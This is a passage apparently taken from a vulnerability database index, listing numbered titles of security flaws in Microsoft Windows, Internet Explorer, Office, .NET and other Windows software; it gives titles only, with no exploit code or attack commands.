Windows NT GINA Arbitrary Clipboard Content Disclosure [868] Microsoft Windows Compressed Folders ZIP Decompression Arbitrary File Write [867] Microsoft Windows Compiled HTML Help (.chm) Arbitrary Command Execution [864] Microsoft Windows Certificate Enrollment ActiveX Arbitrary Certificate Deletion [858] Microsoft Windows NCM Handler Local Privilege Elevation [837] Microsoft Windows RAS Phonebook dial-up String Overflow [788] Microsoft Windows smss.exe Handle Duplication Local Privilege Escalation [773] Microsoft Windows 2000 Group Policy File Lock DoS [772] Microsoft Windows Multiple UNC Provider Request Overflow [736] Microsoft Windows SMB Enumeration Information Disclosure [732] Microsoft Windows SMTP Service Malformed BDAT Request Remote DoS [715] Microsoft Windows NT LsaQueryInformationPolicy Function NULL Session Domain SID Enumeration [714] Microsoft Windows NT LsaQueryInformationPolicy() Function SID User Account Disclosure [697] Microsoft Windows Universal Plug and Play NOTIFY DoS [692] Microsoft Windows Universal Plug and Play NOTIFY Overflow [673] Microsoft Windows NT RPC Endpoint Mapper Malformed Request DoS [665] Microsoft Windows 95 Online Registration Information Disclosure [608] Microsoft Windows IrDa Driver Malformed Packet Remote Overflow DoS [581] Microsoft Windows SMTP Incorrect Credentials Authentication Bypass [572] Microsoft Windows NT NTLMSSP Crafted LPC Request Local Privilege Escalation [515] Microsoft Windows 2000 LDAP Server Arbitrary User Password Modification [511] Microsoft Windows Malformed PPTP Packet Stream Remote DoS [499] Microsoft Windows NT Winsock2ProtocolCatalogMutex Mutex Local DoS [466] Microsoft Windows NT RAS Administration Registry Key Permission Weakness Local Privilege Escalation [454] Microsoft Windows 2000 NTLM Domain Account Lockout Policy Bypass [445] Microsoft Windows LAN Manager SNMP LanMan Information Disclosure [424] Microsoft Windows NT Malformed LPC Request Remote DoS [423] Microsoft Windows File Share Password Protection Bypass [418] Microsoft Windows telnet.exe NTLM Authentication Information Disclosure [408] Microsoft Windows Malformed DCE/RPC SMBwriteX Request DoS [403] Microsoft Windows 2000 Still Image Service WM_USER Message Local Overflow [398] Microsoft Windows 2000 Malformed RPC Traffic Local Security Policy Corruption DoS [385] Microsoft Windows Shell Executable (Explorer.exe) Registry Relative Path Privilege Escalation [336] Microsoft Windows CIFS Computer Browser ResetBrowser Frame DoS [335] Microsoft Windows Fragmented IP Packet Saturation DoS (jolt2) [334] Microsoft Windows Registry: Permission to Modify Common Paths [332] Microsoft Windows Registry Key Permission Weakness Admin Privilege Escalation [331] Microsoft Windows Remote Registry Access [316] Microsoft Windows NT Remote Registry Server WinLogon.exe Malformed Request Local DoS [304] Microsoft Windows NT service pack level via remote registry access [303] Microsoft Windows NetBIOS Null Session Remote Registry Access [300] Microsoft Windows SMB LanMan Pipe Server Listing Disclosure [299] Microsoft Windows NetBIOS Shares Access Control Weakness [297] Microsoft Windows Installation ADMIN$ Share Arbitrary Access [218] Microsoft Windows Multiple TCP/IP Stack Malformed Ping DoS [129] Microsoft Windows NT FTP 'guest' Account [96192] Microsoft IE EUC-JP Character Encoding XSS [96191] Microsoft IE Process Integrity Level Assignment Bypass [96190] Microsoft IE Unspecified Memory Corruption (2013-3199) [96189] Microsoft IE Unspecified Memory Corruption (2013-3194) [96188] Microsoft IE Unspecified Memory Corruption (2013-3193) [96187] Microsoft IE Unspecified Memory Corruption (2013-3191) [96186] Microsoft IE Unspecified Memory Corruption (2013-3190) [96185] Microsoft IE Unspecified Memory Corruption (2013-3189) [96184] Microsoft IE Unspecified Memory Corruption (2013-3188) [96183] Microsoft IE Unspecified Memory Corruption (2013-3187) [96182] Microsoft IE Unspecified Memory Corruption (2013-3184) [96181] Microsoft Active Directory Federation Services (AD FS) Open Endpoint Unspecified Account Information Disclosure [96127] National Instruments LabWindows/CVI Help Subsystem ActiveX Unspecified Issue [95886] OpenAFS for Windows afslogon.dll krb5_context Creation Failure Memory Exhaustion Remote DoS [95826] Microsoft IE jscript9.dll Recycler::ProcessMark Function Garbage Collection Object Address Information Disclosure Weakness [95687] Microsoft IE Enhanced / Protected Mode Elevation Policy Check Bypass [95617] Microsoft IE 9 Status Bar Spoofing Weakness [95569] Microsoft DirectShow Runtime quartz.dll CWAVEStream::GetMaxSampleSize() Function Multiple Sound File Handling Divide-by-Zero DoS Weakness [95377] Novell GroupWise on Windows Email Message Body Arbitrary Code Execution Weakness [95029] Google Chrome for Windows GL Texture Screen Information Disclosure [94984] Microsoft IE Shift JIS Character Encoding XSS [94983] Microsoft IE Unspecified Memory Corruption (2013-3115) [94982] Microsoft IE Unspecified Memory Corruption (2013-3164) [94981] Microsoft IE Unspecified Memory Corruption Arbitrary Code Execution (2013-3163) [94980] Microsoft IE Unspecified Memory Corruption (2013-3162) [94979] Microsoft IE Unspecified Memory Corruption (2013-3161) [94978] Microsoft IE Unspecified Memory Corruption (2013-3153) [94977] Microsoft IE Unspecified Memory Corruption (2013-3152) [94976] Microsoft IE Unspecified Memory Corruption (2013-3151) [94975] Microsoft IE Unspecified Memory Corruption (2013-3150) [94974] Microsoft IE Unspecified Memory Corruption (2013-3146) [94973] Microsoft IE Unspecified Memory Corruption (2013-3149) [94972] Microsoft IE Unspecified Memory Corruption (2013-3148) [94971] Microsoft IE Unspecified Memory Corruption (2013-3147) [94969] Microsoft IE Unspecified Memory Corruption (2013-3145) [94968] Microsoft IE Unspecified Memory Corruption (2013-3144) [94967] Microsoft IE Unspecified Memory Corruption (2013-3143) [94960] Microsoft Multiple Product TrueType Font (TTF) File Handling Arbitrary Code Execution [94959] Microsoft .NET Framework / Silverlight Multidimensional Arrays Small Structure Handling Arbitrary Code Execution [94958] Microsoft Silverlight NULL Pointer Handling Arbitrary Code Execution [94957] Microsoft .NET Framework Delegate Object Serialization Permission Validation Privilege Escalation [94956] Microsoft .NET Framework Small Structure Array Allocation Remote Code Execution [94955] Microsoft .NET Framework Anonymous Method Injection Reflection Objection Permission Validation Privilege Escalation [94954] Microsoft .NET Framework Delegate Reflection Bypass Reflection Objection Permission Validation Privilege Escalation [94507] Microsoft IE Infinite Loop DoS [94330] Microsoft Outlook S/MIME EmailAddress Attribute Mismatch Weakness [94154] IBM Informix Dynamic Server on Windows Crafted SQLIDEBUG Handling Remote DoS [94127] Microsoft Office PNG File Handling Buffer Overflow [94123] Microsoft IE Webpage Script Debugging Memory Corruption [94122] Microsoft IE Unspecified Memory Corruption (2013-3142) [94121] Microsoft IE Unspecified Memory Corruption (2013-3141) [94120] Microsoft IE Unspecified Memory Corruption (2013-3139) [94119] Microsoft IE Unspecified Memory Corruption (2013-3125) [94118] Microsoft IE Unspecified Memory Corruption (2013-3124) [94117] Microsoft IE Unspecified Memory Corruption (2013-3123) [94116] Microsoft IE Unspecified Memory Corruption (2013-3122) [94115] Microsoft IE Unspecified Memory Corruption (2013-3121) [94114] Microsoft IE Unspecified Memory Corruption (2013-3120) [94113] Microsoft IE Unspecified Memory Corruption (2013-3119) [94112] Microsoft IE Unspecified Memory Corruption (2013-3118) [94111] Microsoft IE Unspecified Memory Corruption (2013-3117) [94110] Microsoft IE Unspecified Memory Corruption (2013-3116) [94109] Microsoft IE Unspecified Memory Corruption (2013-3114) [94108] Microsoft IE Unspecified Memory Corruption (2013-3113) [94107] Microsoft IE Unspecified Memory Corruption (2013-3112) [94106] Microsoft IE Unspecified Memory Corruption (2013-3111) [94105] Microsoft IE Unspecified Memory Corruption (2013-3110) [94094] Splunk for Windows Universal Forwarder Path Subversion Local Privilege Escalation [93840] Google Chrome for Windows GetFileHandleForProcess Function ipc_platform_file.cc Handle Value Validation Issue [93723] Novell Client for Windows nwfs.sys 0x1439EB IOCTL Handling Local Integer Overflow [93718] Novell Client for Windows nicm.sys 0x143B6B IOTCL Request Handling Local Privilege Escalation [93425] Mozilla Multiple Product Mozilla Maintenance Service for Windows Local Privilege Escalation [93396] Microsoft Malware Protection Engine Crafted File Scan Handling Memory Corruption [93316] Microsoft Visio File Handling External Entity (XXE) Data Parsing Arbitrary File Access [93315] Microsoft Office Word DOC File Shape Data Handling Arbitrary Code Execution [93314] Microsoft Office Publisher PUB File Handling Buffer Underflow [93313] Microsoft Office Publisher PUB File Pointer Handling Arbitrary Code Execution [93312] Microsoft Office Publisher PUB File Signed Integer Handling Arbitrary Code Execution [93311] Microsoft Office Publisher PUB File Incorrect NULL Value Handling Arbitrary Code Execution [93310] Microsoft Office Publisher PUB File Invalid Range Check Handling Arbitrary Code Execution [93309] Microsoft Office Publisher PUB File Return Value Validation Arbitrary Code Execution [93308] Microsoft Office Publisher PUB File Handling Buffer Overflow [93307] Microsoft Office Publisher PUB File Return Value Handling Arbitrary Code Execution [93306] Microsoft Office Publisher PUB File Corrupt Interface Pointer Handling Arbitrary Code Execution [93305] Microsoft Office Publisher PUB File Handling Integer Overflow [93304] Microsoft Office Publisher PUB File Negative Value Allocation Handling Arbitrary Code Execution [93303] Microsoft Lync Unspecified Use-after-free Arbitrary Code Execution [93302] Microsoft .NET Framework WCF Endpoint Authentication Unspecified Policy Requirement Weakness Authentication Bypass [93301] Microsoft .NET Framework XML File Signature Validation Spoofing Weakness [93298] Microsoft IE CMarkup Object Handling Use-after-free Arbitrary Code Execution [93297] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1312) [93296] Microsoft IE textNode Style Computation Use-after-free Arbitrary Code Execution [93295] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1310) [93294] Microsoft IE CDispNode Use-after-free Arbitrary Code Execution [93293] Microsoft IE TransNavContext Object Handling Use-after-free Arbitrary Code Execution [93292] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1307) [93291] Microsoft IE Anchor Element Handling Use-after-free Arbitrary Code Execution [93290] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-0811) [93289] Microsoft IE Unspecified JSON Data File Information Disclosure [93081] Microsoft Security Essentials UninstallString Unquoted Search Path Local Privilege Escalation Weakness [93075] Forbes Magazine Microsoft Office 365 T-Mobile Router Admin Interface Default Password [93005] Microsoft IE MSXML XMLDOM Object Local File Enumeration [92993] Microsoft IE CGenericElement Object Handling Use-after-free Arbitrary Code Execution [92985] DotNetNuke Modal Windows XSS [92931] Microsoft System Center Operations Manager Web Console /InternalPages/ViewTypeManager.aspx Multiple Parameter XSS [92913] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1338) [92771] HP OpenView Operations / VantagePoint for Windows Remote Managed Node Unauthorized Command Execution [92487] Sleipnir on Windows SSL Indicators Unspecified Spoofing Weakness [92284] Microsoft IE localStorage Method History Manipulation Disk Consumption DoS [92257] Microsoft IE CSS Import Handling Remote DoS [92129] Microsoft Office HTML Sanitization Component Unspecified XSS [92128] Microsoft Antimalware Client Improper Pathname Handling Local Privilege Escalation Weakness [92123] Microsoft SharePoint Server SharePoint Lists Access Control Handling Unspecified Information Disclosure [92121] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1304) [92120] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1303) [92015] Windows SNMP Default Community Write Permission Remote Device Manipulation [91822] Juniper IVE OS Secure Access (SA) Windows Secure Application Manager Uninstall Link XSS [91199] FFmpeg libavcodec msrledec.c msrle_decode_8_16_24_32 Function Microsoft RLE Data Processing DoS [91198] Microsoft IE Broker Process Variant Object Handling Sandbox Bypass Arbitrary Code Execution [91197] Microsoft IE vml.dll Vector Graphic Property Handling Integer Overflow [91196] Microsoft IE Broker Pop-up Window Handling Protected Mode Bypass (pwn2own) [91179] Schneider Electric CD Kerwin on Windows Unauthenticated Synoptic Access [91177] Schneider Electric CD Kerwin on Windows Synoptics Information Disclosure [91154] Microsoft Office for Mac HTML5 Email Message Unspecified Content Tag Loading Information Disclosure [91153] Microsoft OneNote Buffer Size Validation ONE File Handling Information Disclosure [91152] Microsoft SharePoint Unspecified Remote Buffer Overflow DoS [91151] Microsoft SharePoint Unspecified Traversal Privilege Escalation [91150] Microsoft SharePoint Unspecified XSS [91149] Microsoft SharePoint Callback Function Unspecified URL Handling Privilege Escalation [91148] Microsoft Visio Viewer Unspecified Tree Object Type Confusion Visio File Handling Arbitrary Code Execution [91147] Microsoft Silverlight Application Handling Unspecified Double Dereference Arbitrary Code Execution [91146] Microsoft IE CTreeNode Unspecified Use-after-free Arbitrary Code Execution [91145] Microsoft IE removeChild CHtmlComponentProperty Object Handling Use-after-free Arbitrary Code Execution [91144] Microsoft IE onBeforeCopy execCommand selectAll Event Handling Use-after-free Arbitrary Code Execution [91143] Microsoft IE GetMarkupPtr execCommand Print Event Handling Use-after-free Arbitrary Code Execution [91142] Microsoft IE CElement Unspecified Use-after-free Arbitrary Code Execution [91141] Microsoft IE CCaret Unspecified Use-after-free Arbitrary Code Execution [91140] Microsoft IE CMarkupBehaviorContext Object Handling Use-after-free Arbitrary Code Execution [91139] Microsoft IE saveHistory Onload Event Handler Event Handling Use-after-free Arbitrary Code Execution [91138] Microsoft IE OnResize / OnMove CElement::EnsureRecalcNotify() Function Use-after-free Arbitrary Code Execution [91066] IBM WebSphere Application Server (WAS) on Windows was.policy File Permission Handling Weakness [90933] Microsoft IE Arbitrary HTM File Execution [90932] Citrix Metaframe for Windows Malformed Java Applet Handling Remote DoS [90743] RSA Authentication Agent for Windows Quick PIN Unlock Passcode Bypass [90127] Microsoft IE Vector Markup Language (VML) Buffer Allocation Memory Corruption [90126] Microsoft IE CHTML CSelectionManager Object Handling Use-after-free Arbitrary Code Execution [90125] Microsoft IE CObjectElement Object Handling Use-after-free Arbitrary Code Execution [90124] Microsoft IE CPasteCommand Use-after-free Arbitrary Code Execution [90123] Microsoft IE InsertElement Use-after-free Arbitrary Code Execution [90122] Microsoft IE SLayoutRun Use-after-free Arbitrary Code Execution [90121] Microsoft IE pasteHTML TextRange Object Handling Use-after-free Arbitrary Code Execution [90120] Microsoft IE CDispNode SVG Object Handling Use-after-free Arbitrary Code Execution [90119] Microsoft IE LsGetTrailInfo Use-after-free Arbitrary Code Execution [90118] Microsoft IE vtable Use-after-free Arbitrary Code Execution [90117] Microsoft IE CMarkup / CData Object Handling Use-after-free Arbitrary Code Execution [90116] Microsoft IE COmWindowProxy Use-after-free Arbitrary Code Execution [90115] Microsoft IE SetCapture Method Handling Use-after-free Arbitrary Code Execution [90114] Microsoft IE Shift JIS Character Encoding Information Disclosure [89619] Microsoft IE Proxy Server TCP Session Re-use Cross-user Information Disclosure Weakness [89618] Microsoft IE HTTP / Secure Request Handling Spoofing Weakness [89593] Embedthis Appweb on Windows src/mpr/mprLib.c mprUrlEncode Function Heap-based Overflow [89553] Microsoft IE SRC Attribute UNC Share Pathname Handling Arbitrary File Information Disclosure [89478] Cisco VPN Client for Windows VPN Driver Malformed Application Handling Local DoS [89303] Scribus on Windows Python Scripter Unspecified Issue [89164] Microsoft Lync User-Agent Header Handling Remote Arbitrary Command Execution [89086] Google Chrome for Windows IPC NUL Termination Weakness [89080] Google Chrome for Windows Shared Memory Allocation Handling Integer Overflow [89037] Sybase Adaptive Server Enterprise for Windows Unspecified DoS [89035] Sybase Adaptive Server Enterprise for Windows Unspecified Installation Log File Information Disclosure [88968] Microsoft .NET Framework Replace() Function Open Data Protocol (OData) HTTP Request Parsing Remote DoS [88965] Microsoft .NET Framework Double Construction Privilege Escalation [88964] Microsoft .NET Framework System.DirectoryServices.Protocols.SortRequestControl.GetValue() Method this.keys.Length Parameter Heap Buffer Overflow [88962] Microsoft .NET Framework System Drawing Memory Pointer Handling CAS Bypass Information Disclosure [88961] Microsoft System Center Operations Manager Web Console /InternalPages/ExecuteTask.aspx __CALLBACKPARAM Parameter XSS [88960] Microsoft System Center Operations Manager Web Console Unspecified XSS (2013-0009) [88959] Microsoft XML Core Services Integer Truncation XML Handling Memory Corruption [88958] Microsoft XML Core Services Unspecified XSLT Handling Memory Corruption [88914] Eye-Fi Helper for Windows Image .tar Handling Traversal Arbitrary File Write Remote Privilege Escalation [88837] Microsoft Office Excel Memory Corruption DoS [88811] Microsoft Visio VSD File Parsing Memory Corruption [88774] Microsoft IE CDwnBindInfo Object Handling Use-after-free Arbitrary Code Execution [88650] Novell NetIQ eDirectory on Windows dhost Malformed HTTP Request Handling Remote DoS [88642] Trend Micro InterScan VirusWall for Windows interscan.dll Unauthenticated Configuration Manipulation [88638] Jetty on Windows Mixed Case WEB-INF Request Security Bypass [88548] gnome-screensaver gs-manager.c show_windows() Function System Resume Screen Content Disclosure [88539] Microsoft IE mshtml.dll Unclosed Tags Sequence Handling Overflow Arbitrary Code Execution [88357] Microsoft IE fireEvent() Method Mouse / Keyboard Activity Disclosure [88319] Microsoft IE InjectHTMLStream Object Handling Use-after-free Arbitrary Code Execution [88318] Microsoft IE CMarkup Object Handling Use-after-free Arbitrary Code Execution [88317] Microsoft IE Object Ref Counting Use-after-free Arbitrary Code Execution [88315] Microsoft Office Word RTF listoverridecount Element Handling Remote Code Execution [88314] Microsoft Exchange Server RSS Feed Handling Unspecified Remote DoS [88311] Microsoft IP-HTTPS Component Revoked Certificate Restriction Bypass [88170] Microsoft IE Malformed Location Header 30x Redirect Handling DoS [87881] WibuKey Runtime for Windows WkWin32.dll Module DisplayMessageDialog() Method String Parsing Overflow [87819] Microsoft Office OneNote File Handling Memory Corruption [87666] Diebold AccuVote-TSX / GEMS SSL Certificate Windows Registry Plaintext Local Password Disclosure [87555] Adobe ColdFusion for Microsoft IIS Unspecified DoS [87506] Tor Relay Descriptor Windows Capabilities Remote Disclosure [87494] Oracle MySQL on Windows Field_new_decimal::store_value dbug_buff Variable Overflow DoS [87273] Microsoft Office Excel XLS File Handling Overflow [87272] Microsoft Office Excel XLS File Invalid Length SST Handling Use-after-free Arbitrary Code Execution [87271] Microsoft Office Excel XLS File Handling Memory Corruption [87270] Microsoft Office Excel SerAuxErrBar XLS File Handling Overflow [87267] Microsoft .NET Framework WPF Reflection Optimization Object Permission Handling Arbitrary Code Execution [87266] Microsoft .NET Framework Web Proxy Setting Auto-Discovery (WPAD) Handling Remote Code Execution [87265] Microsoft .NET Framework Path Subversion Arbitrary DLL Injection Code Execution [87264] Microsoft .NET Framework Partially Trusted Code Function Handling Information Disclosure [87263] Microsoft .NET Framework Reflection Object Permission Handling Arbitrary Code Execution [87262] Microsoft IIS FTP Command Injection Information Disclosure [87261] Microsoft IIS Log File Permission Weakness Local Password Disclosure [87258] Microsoft IE CTreePos Deleted Object Handling Use-after-free Arbitrary Code Execution [87257] Microsoft IE CFormElement Deleted Object Handling Use-after-free Arbitrary Code Execution [87256] Microsoft IE CTreeNode Deleted Object Handling Use-after-free Arbitrary Code Execution [87255] Microsoft Office Excel XLS File Handling Memory Corruption [87058] Sophos Anti-Virus for Windows Buffer Overflow Protection System (BOPS) sophos_detoured_x64.dll ASLR Bypass [86929] Microsoft MN-700 Hardcoded SSL Private Key SSL Traffic Decryption Weakness [86924] X Windows (X11R6) Malformed Font Size Handling DoS [86913] Microsoft IE Recursive JavaScript Event Handling DoS [86906] Microsoft Multiple Products VBScript ActiveX Word Object Handling DoS [86899] Microsoft IIS 302 Redirect Message Internal IP Address Remote Disclosure [86898] Microsoft IE Crafted IMG Tag Saturation Remote DoS [86897] Oracle on Windows TNSLSNR80.EXE Malformed Input Parsing Remote DoS [86896] Microsoft IE MSScriptControl.ScriptControl GetObject Arbitrary File Access [86790] Microsoft Virtual PC 2007 Crafted x86 Instruction Sequence Handling Local DoS [86776] Microsoft IE 9 File NULL Byte Handling XSS Filter Bypass [86767] Microsoft Office Publisher Read Access Violation PUB File Handling Memory Corruption [86733] Microsoft Office Picture Manager GIF Image File Handling Memory Corruption [86732] Microsoft Office DOC File Handling Stack Overflow [86623] Microsoft Office Excel / Excel Viewer (Xlview.exe) XLS File Handling Arbitrary Code Execution [86622] Microsoft SQL Server Local Authentication Bypass [86515] Mozilla Firefox nsFilePicker Windows Recent Documents Privacy Mode Bypass [86512] Mozilla Firefox on Windows 7 Jump Bar Limited Browsing History Disclosure [86179] ActiveTcl on Windows Path Subversion Arbitrary DLL Injection Code Execution [86178] Python on Windows Path Subversion Arbitrary DLL Injection Code Execution [86177] ActivePerl on Windows Path Subversion Arbitrary DLL Injection Code Execution [86176] ActivePython on Windows Path Subversion Arbitrary DLL Injection Code Execution [86175] Oracle MySQL on Windows Path Subversion Arbitrary DLL Injection Code Execution [86174] Zend Server on Windows Path Subversion Arbitrary DLL Injection Code Execution [86173] RubyInstaller on Windows Path Subversion Arbitrary DLL Injection Code Execution [86172] PHP on Windows Path Subversion Arbitrary DLL Injection Code Execution [86158] EMC NetWorker Module for Microsoft Applications (NMM) Communication Channel Crafted Message Parsing Remote Code Execution [86157] EMC NetWorker Module for Microsoft Applications (NMM) MS Exchange Server Upgrade / Installation Cleartext Admin Credential Local Information Disclosure [86059] Microsoft Multiple Product HTML String Sanitization XSS Weakness [86057] Microsoft SQL Server Report Manager Unspecified XSS [86056] Microsoft Works Unspecified DOC File Handling Memory Corruption [86055] Microsoft Multiple Product RTF File listid Handling Use-after-free Remote Code Execution [86054] Microsoft Office Word File PAPX Section Handling Memory Corruption [85835] Oracle on Windows bb.sqljsp Traversal Arbitrary File Access [85834] Oracle on Windows a.jsp Traversal Arbitrary File Access [85833] Microsoft Outlook Concealed Attachment Weakness [85832] Microsoft Virtual Machine Custom Java Codebase Arbitrary Command Execution [85830] Microsoft IE index.dat OBJECT DATA Tag File Injection Arbitrary Command Execution [85826] Microsoft IE mstask.exe Malformed Packet Handling CPU Consumption Remote DoS [85727] RSA Authentication Agent / Client Windows Credentials Usage Local Authentication Bypass [85574] Microsoft IE cloneNode Element Use-after-free Memory Corruption [85573] Microsoft IE CTreeNode Object ISpanQualifier Instance Type Confusion Use-after-free Memory Corruption [85572] Microsoft IE Event Listener Unspecified Use-after-free Memory Corruption [85571] Microsoft IE OnMove Unspecified Use-after-free Memory Corruption [85532] Microsoft IE CMshtmlEd::Exec() Function Use-after-free Remote Code Execution [85316] Microsoft System Center Configuration Manager ReportChart.asp URI XSS [85315] Microsoft Visual Studio Team Foundation Server Unspecified XSS [84912] Microsoft MS-CHAP V2 Virtual Private Network (VPN) MitM Password Disclosure [84896] Skype on Windows Malformed File Transfer Remote Memory Corruption DoS [84606] Microsoft Visio DXF File Handling Overflow [84605] Microsoft Office Computer Graphics Metafile (CGM) File Handling Memory Corruption [84597] Microsoft IE JavaScript Parsing Memory Object Size Calculation Memory Corruption [84596] Microsoft IE NULL Object Handling Use-after-free Arbitrary Code Execution [84595] Microsoft IE Layout Handling Deleted Object Handling Memory Corruption [84594] Microsoft IE Deleted Virtual Function Table Handling Arbitrary Code Execution [84553] Microsoft Help &amp [84433] Citrix Access Gateway Plugin for Windows ActiveX (nsepa.exe) StartEPA() Method Multiple HTTP Response Header Parsing Remote Overflow [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access [84224] Sybase Adaptive Server Enterprise for Windows Java Unspecified Arbitrary File Access [83860] Microsoft IE XML Data Handling Arbitrary File Access [83797] Microsoft IE on NT Hashed Password Remote Disclosure MiTM Weakness [83771] Microsoft IIS Tilde Character Request Parsing File / Folder Name Information Disclosure [83720] Microsoft .NET Framework Crafted Tilde (~) Request Resource Consumption Remote DoS [83672] Microsoft IE NTLM Authentication Remote Information Disclosure [83655] Microsoft Visual Basic for Applications Unspecified Path Subversion Arbitrary DLL Injection Code Execution [83654] Microsoft Office for Mac Insecure Permissions Arbitrary File Creation Local Privilege Escalation [83653] Microsoft IE Deleted Cached Object Handling Memory Corruption [83652] Microsoft IE Attribute Removal Handling Memory Corruption [83651] Microsoft SharePoint Reflected List Parameter Unspecified XSS [83650] Microsoft SharePoint scriptresx.ashx Unspecified XSS [83649] Microsoft SharePoint Arbitrary User Search Scope Manipulation [83648] Microsoft SharePoint Unspecified Arbitrary Site Redirect [83647] Microsoft SharePoint Username Unspecified XSS [83567] Microsoft NT Advanced Server (NTAS) FTP Client Pipe Character Arbitrary Command Execution [83545] Microsoft Outlook Web App owa/redir.aspx URL Parameter Arbitrary Site Redirect [83454] Microsoft IIS ODBC Tool ctguestb.idc Unauthenticated Remote DSN Initialization [83439] Microsoft IE Long Unicode String Handling DoS [83388] Microsoft JET Database Engine (MS Access) ODBC API Crafted VBA String Remote Command Execution [83386] Microsoft IIS Non-existent IDC File Request Web Root Path Disclosure [83251] Google Chrome for Windows metro_driver.dll Path Subversion Arbitrary DLL Injection Code Execution Weakness [82873] Microsoft XML Core Services Uninitalized Memory Object Handling Remote Code Execution [82872] Microsoft IE Scrolling Events Cross-domain Remote Information Disclosure [82871] Microsoft IE OnRowsInserted Deleted Object Handling Memory Corruption [82870] Microsoft IE insertRow Deleted Object Handling Memory Corruption [82869] Microsoft IE insertAdjacentText Memory Location Accessing Memory Corruption [82868] Microsoft IE OnBeforeDeactivate Event Deleted Object Handling Memory Corruption [82867] Microsoft IE Title Element Change Deleted Object Handling Memory Corruption [82866] Microsoft IE Col Element Deleted Object Handling Memory Corruption [82865] Microsoft IE Same ID Property Deleted Object Handling Memory Corruption [82864] Microsoft IE Developer Toolbar Deleted Object Handling Memory Corruption [82863] Microsoft IE Null Byte Process Memory Remote Information Disclosure [82862] Microsoft IE EUC-JP Character Encoding XSS [82861] Microsoft IE HTML Sanitization String Handling Remote Information Disclosure [82860] Microsoft IE Center Element Deleted Object Handling Memory Corruption [82859] Microsoft .NET Framework Memory Access Function Pointer Handling Memory Corruption [82853] Microsoft Dynamics AX Enterprise Portal Unspecified XSS [82852] Microsoft Lync Unspecified Path Subversion Arbitrary DLL Injection Code Execution [82848] Microsoft IIS $INDEX_ALLOCATION Data Stream Request Authentication Bypass [82673] Mozilla Multiple Product Windows Shares HTML Page Loading Arbitrary File Access [82565] Microsoft IE / Outlook OBJECT Handling Arbitrary File Access [82564] Microsoft Word WebView Crafted Metadata Handling Arbitrary Script Execution [82563] Microsoft Visual Studio WebViewFolderIcon ActiveX (MSCOMM32.OCX) Overflow [82562] Microsoft IE Cross-Origin Window Forced Navigation Weakness [82473] Microsoft WordPad DOC File Handling NULL Pointer Dereference DoS [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion [82405] Microsoft ASP.NET Session ID Generation Entropy Weakness [81960] Google Chrome for Windows NPAPI Plugins Search Path Subversion Local Privilege Escalation [81903] Microsoft Office X for Macintosh Registration Service Remote Overflow DoS [81734] Microsoft .NET Framework Untrusted User Input Serialization Remote Code Execution [81733] Microsoft .NET Framework Partially Trusted Assembly Object Serialization Remote Code Execution [81732] Microsoft Office RTF Data Handling Memory Corruption [81731] Microsoft Visio Viewer Attribute Validation Visio File Handling Memory Corruption [81728] Microsoft Office Excel Excel File Handling Memory Corruption [81727] Microsoft Office Excel OBJECTLINK Record Excel File Handling Memory Corruption [81726] Microsoft Office Excel Modified Bytes Excel File Handling Memory Corruption [81725] Microsoft Office Excel SLXI Record Excel File Handling Memory Corruption [81724] Microsoft Office Excel Type Mismatch Series Record Excel File Handling Memory Corruption [81723] Microsoft Office Excel MergeCells Record Excel File Handling Overflow [81722] Microsoft .NET Framework Buffer Allocation XBAP / .NET Application Handling Remote Code Execution [81721] Microsoft .NET Framework WPF Application Index Value Comparison Request Parsing Remote DoS [81719] Microsoft Office GDI+ Library Embedded EMF Image Office Document Handling Overflow [81718] Microsoft Silverlight Hebrew Unicode Engine XAML Glyph Rendering Double-free Remote Code Execution [81624] IBM AppScan / Policy Tester Integrated Windows Authentication Service Account Hijacking [81331] Microsoft Visual Studio Incremental Linker (link.exe) ConvertRgImgSymToRgImgSymEx Function COFF Symbol Table Executable Handling Remote Overflow [81134] Microsoft Multiple Product Works Converter WPS File Handling Remote Overflow [81133] Microsoft .NET Framework CRL (Common Language Runtime) Function Parameter Parsing Remote Code Execution [81132] Microsoft Forefront Unified Access Gateway Default Website Configuration External Network Information Disclosure [81131] Microsoft Forefront Unified Access Gateway UAG Server Arbitrary Site Redirect [81130] Microsoft IE vgx.dll VML Style Deleted Object Handling Remote Memory Corruption [81129] Microsoft IE SelectAll Deleted Object Handling Remote Memory Corruption [81128] Microsoft IE onReadyStateChange Event Deleted Object Handling Remote Memory Corruption [81127] Microsoft IE JScript9 Deleted Object Handling Remote Memory Corruption [81126] Microsoft IE Print Feature HTML Page Printing Remote Code Execution [81125] Microsoft Multiple Product MSCOMCTL.OCX Multiple Control Memory Corruption [81112] Microsoft SQL Server RESTORE DATABASE Command SQL Injection [80487] Microsoft Security Essentials Antimalware Engine Malformed CAB File Handling Scan Bypass [80443] Microsoft Security Essentials Antimalware Engine Malformed RAR File Handling Scan Bypass [80402] Microsoft Security Essentials Antimalware Engine Malformed TAR File Handling Scan Bypass [80376] Sophos Anti-Virus Malformed Microsoft Office File Handling Scan Bypass [80375] Comodo Antivirus Malformed Microsoft Office File Handling Scan Bypass [80352] Bitcoin-Qt for Windows Malformed Bitcoin Protocol Message Handling Remote Code Execution [80174] Microsoft IE Protected Mode Bypass Low Integrity Process Handling Memory Corruption DoS [80173] Microsoft IE Unspecified Overflow [80088] Apple Safari Internationalized for Windows Domain Name (IDN) Feature Homoglyph Parsing Domain Name Spoofing Weakness [80006] Microsoft Visual Studio Add-In Loading Local Privilege Escalation [80001] Microsoft Expression Design Path Subversion Arbitrary DLL Injection Code Execution [79629] Diebold AccuVote-TS Memory Card explorer.glb BallotStation Boot Sequence Bypass Windows Access [79551] Sun Java on Windows fontmanager.dll UIManager.getSystemLookAndFeelClassName Function Overflow [79268] Microsoft IE Deleted Object VML Handling Remote Memory Corruption [79267] Microsoft IE String Creation NULL Byte Handling Process Memory Information Disclosure [79266] Microsoft IE Deleted Object HTML Layout Handling Remote Memory Corruption [79265] Microsoft IE Copy and Paste Cross-domain Information Disclosure [79264] Microsoft SharePoint wizardlist.aspx skey Parameter XSS [79263] Microsoft SharePoint themeweb.aspx Unspecified XSS [79262] Microsoft SharePoint 